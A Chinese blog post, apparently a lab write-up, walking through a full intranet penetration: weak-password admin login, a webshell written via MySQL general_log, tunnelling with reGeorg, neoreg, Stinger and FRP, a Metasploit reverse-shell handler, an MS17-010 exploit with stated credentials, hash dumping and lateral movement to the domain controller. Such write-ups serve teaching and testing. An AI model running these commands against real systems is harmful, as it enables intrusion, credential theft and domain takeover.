记一次完整的内网渗透过程总结

admin 2025年6月30日18:37:12评论18 views字数 2287阅读7分37秒阅读模式

一、环境搭建

本次渗透测试所需环境包含三台服务器,各服务器网络配置如下:

  • web 端:双网卡配置,外网 IP 为192.168.3.143,内网 IP 为10.10.10.101
  • pc:内网 IP 为10.10.10.141
  • DC:内网 IP 为10.10.10.10

二、外网信息收集

(一)端口扫描

对 IP 192.168.3.143 进行端口扫描,初步获取 web 服务开放情况。

记一次完整的内网渗透过程总结

(二)目录扫描

使用dirsearch工具进行目录扫描,发现存在phpadmin后台。

记一次完整的内网渗透过程总结

(三)弱口令登录

基于扫描得到的管理员路径,尝试使用弱口令登录,成功进入系统,发现文件写入漏洞,进而获取 webshell。

记一次完整的内网渗透过程总结
记一次完整的内网渗透过程总结
记一次完整的内网渗透过程总结

三、内网渗透

(一)内网信息收集

进入内网后,收集 IP 信息,并上传fscan工具进行内网扫描。扫描发现内网存在phpMyadmin。

记一次完整的内网渗透过程总结
记一次完整的内网渗透过程总结
记一次完整的内网渗透过程总结

(二)PhpAdmin 获取 shell

通过未授权写入操作获取 shell,具体路径为C:phpstudy_proExtensionsMySQL5.7.26 。在进行文件写入时,需关注secure_file_priv的值:

  • 当value为 “null” 时,不允许读取任意文件
  • 当value为 “空” 时,允许读取任意文件
  • value也可设置为其他指定路径

同时,利用general_log和general_log_file特性写入 webshell,操作步骤如下:

  1. 开启日志记录:set global general_log = “ON”;
  1. 设置日志文件路径:set global general_log_file=‘C:/phpstudy_pro/www/shell1.php’
记一次完整的内网渗透过程总结
记一次完整的内网渗透过程总结
记一次完整的内网渗透过程总结

(三)网段扫描与漏洞发现

扫描另一个网段,发现存在ms17-010漏洞和域机器。

记一次完整的内网渗透过程总结

四、代理搭建

(一)工具代理

  1. 使用ython reGeorgSocksProxy.py -p 8080 -u http://upload.sensepost.net:8080/tunnel/tunnel.jsp
  1. 使用python neoreg.py -u http://192.168.163.138/www.yxcms6.com/protected/apps/default/view/default/tunnel.php --proxy socks5://10.1.1.1:8888
记一次完整的内网渗透过程总结

(二)毒刺代理

  • windows 服务端:start D:/XXX/stinger_server.exe 0.0.0.0
  • 客户端(vps):./stinger_client -w http://192.168.163.138/www.yxcms6.com/protected/apps/default/view/default/proxy.php -l 127.0.0.1 -p 60000

(三)哥斯拉内置代理

直接使用哥斯拉内置代理功能。

记一次完整的内网渗透过程总结

(四)FRP 代理

  • VPS 服务端配置
[common]
bind_port = 57000
token = 123qwe    
heartbeat_timeout = 90  
max_pool_count = 5
  • webshell 客户端配置
[common]
server_addr = 1.1.1.1
server_port = 57000
token = 123qwe
pool_count = 5
protocol = tcp
health_check_type = tcp
health_check_interval_s = 100
[socks_test]
remote_port = 10000  
plugin = socks5
plugin_user = admin
plugin_passwd = password
use_encryption = true
use_compression = true

五、CS 与 MSF 协同渗透

记一次完整的内网渗透过程总结

(一)MSF 基础配置

在msfconsole中进行如下配置:

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.239.198
set lport 6666
run
记一次完整的内网渗透过程总结
记一次完整的内网渗透过程总结

(二)MSF 代理搭建

将哥斯拉的 shell 转到 msf 上,利用 msf 搭建代理。

记一次完整的内网渗透过程总结

(三)永恒之蓝攻击

使用 msf 针对ms17-010漏洞进行攻击,配置如下:

use exploit/windows/smb/ms17_010_psexec
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.239.198
set LPORT 4444
set RHOST 192.168.52.141
set SMBUser weizi
set SMBPass HONGRISEC@2019
run
记一次完整的内网渗透过程总结

(四)MSF 与 CS 转换

将 msf 会话转到 cs 上,实现 cs 成功上线。

记一次完整的内网渗透过程总结

六、CS 深度渗透

(一)信息收集

上线后,利用 cs 进行信息收集,获取域内管理员账号,查看 pc 信息及进程,发现域为god.org,并尝试定位域控。

记一次完整的内网渗透过程总结.

记一次完整的内网渗透过程总结
记一次完整的内网渗透过程总结

(二)权限提权

使用 cs 的功能进行权限提权,成功获取管理员权限。

记一次完整的内网渗透过程总结
记一次完整的内网渗透过程总结

(三)Hash 抓取与横向渗透

抓取 hash,获取管理员账号密码,进行横向传递,成功获取 AD 和另一台域内主机。

记一次完整的内网渗透过程总结
记一次完整的内网渗透过程总结
记一次完整的内网渗透过程总结

七、MSF 后续渗透

(一)代理与信息收集

获取 shell 后,设置socks代理,进行信息收集,发现其它主机信息。

记一次完整的内网渗透过程总结
记一次完整的内网渗透过程总结

(二)RDP 代理与攻击

搭建 rdp 代理,成功获取另一台域内主机,继续利用永恒之蓝漏洞进行横向渗透,实现横向登录,成功登录winserver2012 ,最终获取 AD 权限。

记一次完整的内网渗透过程总结

记一次完整的内网渗透过程总结记一次完整的内网渗透过程总结

原文链接:https://xz.aliyun.com/news/18315

原文始发于微信公众号(富贵安全):记一次完整的内网渗透过程总结

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2025年6月30日18:37:12
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   记一次完整的内网渗透过程总结https://cn-sec.com/archives/4211155.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息